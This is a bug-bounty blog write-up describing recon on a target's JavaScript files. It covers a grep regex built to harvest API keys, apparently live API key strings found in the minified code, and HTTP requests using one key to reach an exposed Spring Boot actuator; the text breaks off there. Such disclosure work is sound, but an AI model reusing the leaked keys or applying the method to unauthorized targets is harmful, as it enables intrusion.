<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><style> .purple-background { padding: 20px; margin-bottom: 20px; } .info { text-align: center; margin-bottom: 15px; background-color: rgba(65, 65, 65, 0.3) !important; padding-top: 20px; padding-bottom: 20px; } .info img { width: 50px; /* Ícones pequenos */ height: auto; margin: 0 auto 5px; /* Espaço abaixo da imagem */ } .company-name { font-size: 1.2rem; /* Nome da empresa maior */ color: purple; } .description { font-size: 0.85rem; /* Descrição menor */ color: #DDD; } .nav { display: flex; flex-wrap: wrap; justify-content: space-between; max-width: calc(var(--nav-width) + var(--gap) * 2); margin-inline-start: auto; margin-inline-end: auto; line-height: var(--header-height); } .nav-link { color: white !important; /* Cor branca para todos os itens */ text-decoration: none !important; /* Remover qualquer sublinhado padrão */ font-size: 18px; /* Aumentar o tamanho da fonte */ font-family: 'Source Sans Pro', 'Microsoft Yahei', sans-serif; padding: 12px 15px; /* Aumentar o espaçamento ao redor dos itens */ position: relative; /* Posição relativa para o posicionamento do pseudo-elemento */ } .nav-link::after { content: ''; display: block; width: 100%; height: 3px; /* Grossura do sublinhado */ background-color: purple; /* Cor roxa para o sublinhado */ position: absolute; left: 0; bottom: -3px; /* Espaçamento entre a palavra e o sublinhado */ opacity: 0; /* Inicialmente invisível */ transition: opacity 0.3s; } .nav-link:hover::after, .nav-link:focus::after, .nav-link.active::after { opacity: 1; /* Tornar visível ao passar o mouse, focar ou ser ativo */ } .container-fluid { max-widht: calc(var(--nav-widht) + var(--gap) * 2); padding-right: 50px; /* Aumentar o padding à direita para afastar os itens do canto */ }</style><title>How I g0t 4000$ for AWS Metadata Leak and Takeover $$ | Ferreiraklet</title><meta name="generator" content="Jekyll v4.3.4" /><meta property="og:title" content="How I g0t 4000$ for AWS Metadata Leak and Takeover $$" /><meta name="author" content="Ferreiraklet" /><meta property="og:locale" content="en" /><meta name="description" content="Here is how I g0t $$ pwning AWS cloud of a bug bounty program at HackerOne" /><meta property="og:description" content="Here is how I g0t $$ pwning AWS cloud of a bug bounty program at HackerOne" /><link rel="canonical" href="http://localhost:4000/posts/4000BountyAws/" /><meta property="og:url" content="http://localhost:4000/posts/4000BountyAws/" /><meta property="og:site_name" content="Ferreiraklet" /><meta property="og:image" content="http://localhost:4000/assets/img/Posts/awsleak.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2024-06-03T11:13:13+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="http://localhost:4000/assets/img/Posts/awsleak.png" /><meta property="twitter:title" content="How I g0t 4000$ for AWS Metadata Leak and Takeover $$" /><meta name="twitter:site" content="@Ferreiraklet" /><meta name="twitter:creator" content="@Ferreiraklet" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@type":"BlogPosting","description":"Here is how I g0t $$ pwning AWS cloud of a bug bounty program at HackerOne","dateModified":"2024-06-03T11:13:13+00:00","headline":"How I g0t 4000$ for AWS Metadata Leak and Takeover $$","datePublished":"2024-06-03T11:13:13+00:00","url":"http://localhost:4000/posts/4000BountyAws/","image":"http://localhost:4000/assets/img/Posts/awsleak.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/4000BountyAws/"},"author":{"@type":"Person","name":"Ferreiraklet"},"@context":"https://schema.org"}</script><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <script src="/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><nav class="navbar navbar-expand-lg navbar-dark"><div class="container-fluid"><div id="profile-wrapperx" class="d-flex align-items-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar" style="height: 40px; width: 40px; border-radius: 50%;" onerror="this.style.display='none'"> </a><p></p><div class="site-subtitle" style="padding: 10px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;;font-size: 24px; font-weight: 700;">Ferreiraklet</div></div><button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button><div class="collapse navbar-collapse justify-content-end" id="navbarNavDropdown"><ul class="navbar-nav"><li class="nav-item"> <a class="nav-link " href="/">Home</a><li class="nav-item"> <a class="nav-link " href="/tabs/hacking/">Hacking</a><li class="nav-item"> <a class="nav-link " href="/tabs/bugbounty/">Bug Bounty</a><li class="nav-item"> <a class="nav-link " href="/tabs/acknowledgments/">Acknowledgments</a></ul></div></div></nav><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>How I g0t 4000$ for AWS Metadata Leak and Takeover $$</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Mon, Jun 3, 2024, 11:13 AM +0000" > Jun 3 <i class="unloaded">2024-06-03T11:13:13+00:00</i> </span> by <span class="author"> Ferreiraklet </span></div></div><div class="post-content"> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/awsleak.png" class="post-preview-img"><h1 id="here-is-how-i-g0t--pwning-aws-cloud-of-a-bug-bounty-program-at-hackerone">Here is how I g0t $$ pwning AWS cloud of a bug bounty program at HackerOne</h1><p>First of all, we have some sections that will be covered in this article,</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>┌───────────────Summary────────────────┐
│                                      │
│  1. Fase One - Recon                 │
│     - Reconnaissance                 │
│  2. Fase Two - Manual Analisys       │
│      - Actuator                      │
│      - Exploiting AWS                │
│                                      │
└──────────────────────────────────────┘
</pre></table></code></div></div><h1 id="section-1---recon">Section 1 - Recon</h1><p>In the first part, it is crucial to collect various types of <code class="language-plaintext highlighter-rouge">data</code> from companies, including URLs, endpoints, technologies, subdomains, and JavaScript files.</p><p>This helps establish a baseline of <code class="language-plaintext highlighter-rouge">applications</code> and provides a guide for identifying the most promising areas to examine more closely.</p><p>So, after collecting the subdomains, I run routines to gather different types of data. One of the most important steps is analyzing and <code class="language-plaintext highlighter-rouge">collecting JavaScript</code> files, which play a crucial role. That’s how I started digging into this target.</p><blockquote><p>You can use tools such as getJS, crawlers like katana, gau, gauplus, waybackurls to gather these javascript files.</p></blockquote><p>With the enumeration, I came up with a lot of javascript files, I then ran <code class="language-plaintext highlighter-rouge">https://github.com/tomnomnom/fff</code> to save the pages into a folder named <code class="language-plaintext highlighter-rouge">fffoutput</code>, see:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">wc</span> <span class="nt">-l</span> js.txt
10542

<span class="nv">$ </span><span class="nb">cat </span>js.txt | fff <span class="nt">-S</span> <span class="nt">-o</span> fffoutput
</pre></table></code></div></div><p>Now if you navigate to fffoutput, there will be a lot of folders, which hold every <code class="language-plaintext highlighter-rouge">request</code> and <code class="language-plaintext highlighter-rouge">response</code>,</p><p><code class="language-plaintext highlighter-rouge">.body files</code> -&gt; response files</p><p><code class="language-plaintext highlighter-rouge">.headers files</code> -&gt; files containing headers</p><p>Examples:</p><blockquote><p>.body file</p></blockquote><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nb">cat </span>redacted.com/_next/static/chunks/446.204acfc424e3d7b9edeb.js/b322138c1d3d7a899db28ed61acdf86ca048a796.body

DATAFROMJAVASCRIPTFILEHERE
</pre></table></code></div></div><blockquote><p>.header file</p></blockquote><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">cat </span>redacted.com/_next/static/chunks/446.204acfc424e3d7b9edeb.js/b322138c1d3d7a899db28ed61acdf86ca048a796.headers

GET https://redacted.com/_next/static/chunks/446.204acfc4


&lt; HTTP/1.1 301 Moved Permanently
&lt; Location: https://redacted.com/_next/static/chunks
&lt; Server: nginx
&lt; Date: Wed, 27 Mar 2024 17:13:49 GMT
&lt; Content-Type: text/html
&lt; Content-Length: 162
</pre></table></code></div></div><hr /><h3 id="finding-secrets-inside-javascripts">Finding Secrets inside Javascripts</h3><p>Once downloaded, the key is to navigate to the fffoutput directory and use <code class="language-plaintext highlighter-rouge">recursive grep</code> to find potential <code class="language-plaintext highlighter-rouge">secrets or keys</code> within the JavaScript files.</p><p>I accomplish this with a function that runs multiple recursive grep commands, specifically searching for secrets in the JavaScript files.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre><span class="k">function </span>secrets<span class="o">(){</span>
    ...
    <span class="c"># Here it is the line who found the result of a possible API Key.</span>

    <span class="nb">echo</span> <span class="s2">"[INFO] - Looking for API Keys"</span>
    <span class="nb">grep</span> <span class="nt">-HnriEo</span> <span class="s2">"(apikey|APIKEY)(:|=| : | = )( |</span><span class="se">\"</span><span class="s2">|')[0-9A-Za-z</span><span class="se">\-</span><span class="s2">]{5,100}"</span>
    ...
<span class="o">}</span>
</pre></table></code></div></div><p>Once my function is loaded at the terminal, I can run this inside the <code class="language-plaintext highlighter-rouge">fffoutput</code> folder, and the result will be the regex output</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nv">$ </span>~/recon/redacted/fffoutput λ secrets

redacted.com/main/19230983.js/b322138c1d3d7a899db28ed61acdf86ca048a796.body:1:apiKey:<span class="s2">"Redacted
</span></pre></table></code></div></div><p>I then look to this and every data that seen’s more custom I pay more atention.</p><p>Let’s take a look then</p><div class="language-javascript highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
</pre><td class="rouge-code"><pre><span class="k">return</span> <span class="nx">react__WEBPACK_IMPORTED_MODULE_0___default</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">,</span> <span class="nf">r</span><span class="p">({</span>
    <span class="dl">"</span><span class="s2">data-testid</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Image</span><span class="dl">"</span>
<span class="p">},</span> <span class="o">!</span><span class="nx">W</span> <span class="o">&amp;&amp;</span> <span class="p">{</span>
    <span class="dl">"</span><span class="s2">data-tracking</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">image</span><span class="dl">"</span>
<span class="p">},</span> <span class="p">{</span>
    <span class="na">className</span><span class="p">:</span> <span class="nc">Y</span><span class="p">(</span><span class="dl">"</span><span class="s2">adaptive-img</span><span class="dl">"</span><span class="p">,</span> <span class="nx">m</span><span class="p">,</span> <span class="nx">f</span> <span class="o">&amp;&amp;</span> <span class="dl">"</span><span class="s2">hide-in-desktop</span><span class="dl">"</span><span class="p">,</span> <span class="nx">u</span> <span class="o">&amp;&amp;</span> <span class="dl">"</span><span class="s2">hide-in-tablet</span><span class="dl">"</span><span class="p">,</span> <span class="nx">g</span> <span class="o">&amp;&amp;</span> <span class="dl">"</span><span class="s2">hide-in-mobile</span><span class="dl">"</span><span class="p">,</span> <span class="nx">i</span><span class="p">,</span> <span class="nx">R</span> <span class="o">&amp;&amp;</span> <span class="nx">I</span><span class="p">,</span> <span class="nx">R</span> <span class="o">&amp;&amp;</span> <span class="nx">w</span><span class="p">,</span> <span class="nx">R</span> <span class="o">&amp;&amp;</span> <span class="nx">F</span><span class="p">,</span> <span class="o">!</span><span class="nx">T</span> <span class="o">&amp;&amp;</span> <span class="nx">O</span> <span class="p">?</span> <span class="dl">"</span><span class="s2">imageFixedWidthWrapper</span><span class="dl">"</span> <span class="p">:</span> <span class="kc">null</span><span class="p">)</span>
<span class="p">},</span> <span class="nx">q</span><span class="p">),</span> <span class="nx">a</span> <span class="p">?</span> <span class="nx">react__WEBPACK_IMPORTED_MODULE_0___default</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">a</span><span class="dl">"</span><span class="p">,</span> <span class="nf">r</span><span class="p">({</span>
    <span class="na">className</span><span class="p">:</span> <span class="nc">Y</span><span class="p">(</span><span class="dl">"</span><span class="s2">link</span><span class="dl">"</span><span class="p">,</span> <span class="nx">z</span><span class="p">),</span>
    <span class="dl">"</span><span class="s2">data-testid</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">image-link</span><span class="dl">"</span><span class="p">,</span>
    <span class="na">href</span><span class="p">:</span> <span class="nx">a</span><span class="p">,</span>
    <span class="na">target</span><span class="p">:</span> <span class="nx">h</span>
<span class="p">},</span> <span class="nx">S</span><span class="p">,</span> <span class="p">{</span>
    <span class="na">tabIndex</span><span class="p">:</span> <span class="nx">L</span>
<span class="p">}),</span> <span class="nx">react__WEBPACK_IMPORTED_MODULE_0___default</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="nx">X</span><span class="p">,</span> <span class="nx">K</span><span class="p">))</span> <span class="p">:</span> <span class="nx">react__WEBPACK_IMPORTED_MODULE_0___default</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span>
    <span class="na">className</span><span class="p">:</span> <span class="nc">Y</span><span class="p">(</span><span class="dl">"</span><span class="s2">wrapper-div</span><span class="dl">"</span><span class="p">,</span> <span class="nx">V</span><span class="p">),</span>
    <span class="dl">"</span><span class="s2">data-testid</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">image-div</span><span class="dl">"</span>
<span class="p">},</span> <span class="nx">react__WEBPACK_IMPORTED_MODULE_0___default</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="nx">X</span><span class="p">,</span> <span class="nx">K</span><span class="p">),</span> <span class="nf">_</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nx">y</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nx">f</span> <span class="o">&amp;&amp;</span> <span class="nx">react__WEBPACK_IMPORTED_MODULE_0___default</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span>
    <span class="na">className</span><span class="p">:</span> <span class="nc">Y</span><span class="p">(</span><span class="dl">"</span><span class="s2">img-helper-text</span><span class="dl">"</span><span class="p">)</span>
<span class="p">},</span> <span class="dl">"</span><span class="s2"> Image URL is empty. Please author it.</span><span class="dl">"</span><span class="p">)))</span>
<span class="p">};</span>
<span class="kd">let</span> <span class="nx">recaptchaV3JSLoadded</span> <span class="o">=</span> <span class="o">!</span><span class="mi">1</span><span class="p">,</span>
    <span class="nx">recaptchaV2JSLoadded</span> <span class="o">=</span> <span class="o">!</span><span class="mi">1</span><span class="p">,</span>
    <span class="nx">isRecaptchaV3Verified</span> <span class="o">=</span> <span class="o">!</span><span class="mi">1</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">leadWebhookEndPointInfoByHost</span> <span class="o">=</span> <span class="p">{</span>
        <span class="na">prod</span><span class="p">:</span> <span class="p">{</span>
            <span class="na">url</span><span class="p">:</span> <span class="dl">"</span><span class="s2">https://redacted.com/v1/processData</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">apiKey</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Redacted_APIKey redacted_apikey=prdakyresr5Y8Ik2Nfz6oJNCb0F0QhyT8y0miwWZ</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">uidpCookieName</span><span class="p">:</span> <span class="dl">"</span><span class="s2">qbn.uidp</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">ividCookieName</span><span class="p">:</span> <span class="dl">"</span><span class="s2">ivid</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">ecIdCookieName</span><span class="p">:</span> <span class="dl">"</span><span class="s2">s_ecid</span><span class="dl">"</span>
        <span class="p">},</span>
        <span class="na">e2e</span><span class="p">:</span> <span class="p">{</span>
            <span class="na">url</span><span class="p">:</span> <span class="dl">"</span><span class="s2">https://other.redacted.com/v1/processData</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">apiKey</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Redacted_APIKey redacted_apikey=preprdakyresmHQcpu5KStuX9sv6aW6Fhg4L8Sys</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">uidpCookieName</span><span class="p">:</span> <span class="dl">"</span><span class="s2">qbn.ptc.uidp</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">ividCookieName</span><span class="p">:</span> <span class="dl">"</span><span class="s2">ivid</span><span class="dl">"</span><span class="p">,</span>
            <span class="na">ecIdCookieName</span><span class="p">:</span> <span class="dl">"</span><span class="s2">s_ecid</span><span class="dl">"</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="nx">recaptchaConstants</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.....</span>
<span class="p">.......</span>
<span class="p">.......</span>
</pre></table></code></div></div><hr /><h1 id="section-2---manual-analisys">Section 2 - Manual Analisys</h1><h3 id="ok-we-have-url-and-a-misterious-apikey">Ok, we have url and a misterious apikey</h3><p>At the first look, the javascript file is a little <code class="language-plaintext highlighter-rouge">obfuscated</code>, which makes more hard to understand what is happening. However, this won’t stop us.</p><p>In this case, I noticed a URL accompanied by an <code class="language-plaintext highlighter-rouge">API key</code> in a different format, which caught my attention. Why would there be a URL and an <code class="language-plaintext highlighter-rouge">API key</code> together? Could this be a coincidence?</p><p>After investigating, I found that trying to access the application returned a 403 error, indicating that I was getting <code class="language-plaintext highlighter-rouge">blocked</code>. This could only mean that the API key within the JavaScript file was somehow required to access the server.</p><p>Now the challenge is to figure out how to use this API key. By a stroke of luck, in another part of the code that also mentioned the word <code class="language-plaintext highlighter-rouge">webhook</code></p><p>I found an <code class="language-plaintext highlighter-rouge">XMLHttpRequest</code> concatenating certain data with the Authorization header.</p><div class="language-javascript highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>
<span class="c1">// Look it is obfuscated however we can assume n.open("POST" means that this is a post request to some endpoint, and using a header Authorization to set `t.apiKey`</span>


<span class="nx">submitLeadsToWebhook</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">t</span><span class="p">,</span> <span class="nx">e</span><span class="p">,</span> <span class="nx">i</span><span class="p">,</span> <span class="nx">r</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">s</span><span class="p">)</span> <span class="p">{</span>
                        <span class="kd">const</span> <span class="nx">n</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">;</span>
                        <span class="k">try</span> <span class="p">{</span>
                            <span class="nx">n</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">POST</span><span class="dl">"</span><span class="p">,</span> <span class="nx">t</span><span class="p">.</span><span class="nx">url</span><span class="p">,</span> <span class="o">!</span><span class="mi">0</span><span class="p">),</span> <span class="nx">n</span><span class="p">.</span><span class="nf">setRequestHeader</span><span class="p">(</span><span class="dl">"</span><span class="s2">Authorization</span><span class="dl">"</span><span class="p">,</span> <span class="nx">t</span><span class="p">.</span><span class="nx">apiKey</span><span class="p">),</span> <span class="nx">n</span><span class="p">.</span><span class="nf">setRequestHeader</span><span class="p">(</span><span class="dl">"</span><span class="s2">Content-Type</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">application/json</span><span class="dl">"</span><span class="p">),</span> <span class="nx">n</span><span class="p">.</span><span class="nf">setRequestHeader</span><span class="p">(</span><span class="dl">"</span><span class="s2">accept</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">*/*</span><span class="dl">"</span><span class="p">),</span> <span class="nx">a</span> <span class="o">||</span> <span class="nx">n</span><span class="p">.</span><span class="nf">setRequestHeader</span><span class="p">(</span><span class="dl">"</span><span class="s2">SourceName</span><span class="dl">"</span><span class="p">,</span> <span class="nx">s</span><span class="p">),</span> <span class="nx">n</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">e</span><span class="p">)),</span> <span class="nx">n</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
                                <span class="mi">4</span> <span class="o">===</span> <span class="nx">n</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">&amp;&amp;</span> <span class="nf">processWebhookCallResponse</span><span class="p">(</span><span class="nx">n</span><span class="p">,</span> <span class="nx">i</span><span class="p">,</span> <span class="nx">r</span><span class="p">,</span> <span class="nx">e</span><span class="p">)</span>
                            <span class="p">}</span>
                        <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">t</span><span class="p">)</span> <span class="p">{</span>
                            <span class="k">throw</span> <span class="nf">i</span><span class="p">(),</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">Submit Leads to Webhook call failed. Lead Track Data: </span><span class="dl">"</span><span class="p">.</span><span class="nf">concat</span><span class="p">(</span><span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="kc">null</span> <span class="o">==</span> <span class="nx">e</span> <span class="p">?</span> <span class="k">void</span> <span class="mi">0</span> <span class="p">:</span> <span class="nx">e</span><span class="p">.</span><span class="nx">trackData</span><span class="p">)))</span>
                        <span class="p">}</span>
                    <span class="p">},</span>
</pre></table></code></div></div><hr /><p>In const leadWebhookEndPointInfoByHost our ApiKey gathered is also called as <code class="language-plaintext highlighter-rouge">apiKey</code>, therefore we can assume it is beeing used the same apiKey.</p><p>So our request will be the following</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>GET / HTTP/2
Host: subdomain-xyz.redacted.com
Authorization: Redacted_APIKey redacted_apikey=preprdakyresmHQcpu5KStuX9sv6aW6Fhg4L8Sys
Content-Type: application/json
Accept: */*
Content-Length: 0

</pre></table></code></div></div><p>Now we can access the url:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/whitelabelerror.png" /></p><p>Finally, when we accessed it, we received a “page not found” message. However, this message was familiar to us. It allowed us to <code class="language-plaintext highlighter-rouge">quickly identify</code> that the technology running in the <code class="language-plaintext highlighter-rouge">environment</code> is Spring Boot.</p><h2 id="actuator">Actuator</h2><p>We know It is common for applications using <code class="language-plaintext highlighter-rouge">Spring Boot</code> to incorporate Actuator. <code class="language-plaintext highlighter-rouge">Actuator</code> is a powerful set of tools and features that allow developers to monitor and manage their Spring Boot applications. It provides various endpoints to gain insights into the application’s health, metrics, and other operational aspects.</p><p>As soon as I saw the whitelabel error page message, I attempted to access the <code class="language-plaintext highlighter-rouge">/actuator endpoint</code>, but it was <code class="language-plaintext highlighter-rouge">unavailable</code>. 🙁</p><p>I decided to go back to the code, and I realized that it was calling an endpoint called <code class="language-plaintext highlighter-rouge">processData</code> in <code class="language-plaintext highlighter-rouge">/v1</code>, however, instead of testing this endpoint at the moment, I thought, “why couldn’t the actuator be inside /v1?”</p><h3 id="and-it-looks-like-it-was-inside-v1">And it looks like it was inside /v1</h3><h2 id="exposed">Exposed</h2><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/holy-shit.gif" /></p><hr /><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/Posts/actuator1.png" /></p><p><strong>Request</strong>:</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>GET /v1/actuator HTTP/2
Host: redacted.com
Authorization: Redacted_APIKey redacted_apikey=preprdakyresmHQcpu5KStuX9sv6aW6Fhg4L8Sys
Content-Type: application/json
Accept: */*
Sourcename: s
Content-Length: 0

